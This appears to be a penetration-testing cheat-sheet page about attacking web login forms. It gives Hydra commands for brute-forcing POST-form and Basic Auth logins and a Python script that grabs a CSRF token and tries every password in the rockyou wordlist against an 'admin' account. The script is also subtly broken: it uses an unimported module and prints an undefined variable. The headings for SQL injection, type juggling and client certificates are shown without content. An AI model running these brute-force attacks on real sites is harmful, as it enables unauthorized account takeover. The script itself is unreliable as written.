Login Panes
We can find some login panes that we want to bypass or bruteforce. Here you can find some amazing tricks.
Bruteforce it!
Hydra
POST Forms
hydra <ip-addr> -l user -P passwords.txt -s <port> -vV -f http-form-post "/index.php:user=^USER^&password=^PASS^:Invalid Credentials"
-l user
-L user wordlist
-p password
-P password wordlistBasic Auth
hydra <ip-addr> -l user -P passwords.txt -s <port> -vV -f http-get /index.phpMy own script
#!/usr/bin/env python3
import sys, os, requests, codecs
s = requests.Session()
# Get CRSF TOKEN
resp = s.get("https://WEBPAGE.LOCAL/", verify=False)
regex = '<input type="hidden" name="csrf" value="(.*)"'
token = re.search(regex,resp.text).group(1)
with codecs.open("/usr/share/wordlists/rockyou.txt", 'r', encoding='utf-8', errors='ignore') as wordlist:
dic = wordlist.read().splitlines()
for pwd in dic:
#Bruteforce
data_post = {
"csrf" : token,
"username" : "admin",
"password" : pwd,
}
print("[!] Trying: " + pwd)
resp2 = s.post("https://WEBPAGE.LOCAL/login", json=data_post, verify=False)
if "permission_denied" not in resp2.text:
print("Username = " + username + "Password = " + pwd)
sys.exit(0) Bypass it!
SQLi
SQL InjectionPHP Type Juggling (==)


Magic Hashes
Client Certificates
Setting up the private key and the certificate (Server)
Setting up client certificates
Server Signed Certificate:

Self-Signed Certificate:
Trying to get in
Via Browser

Via Curl
References:
Last updated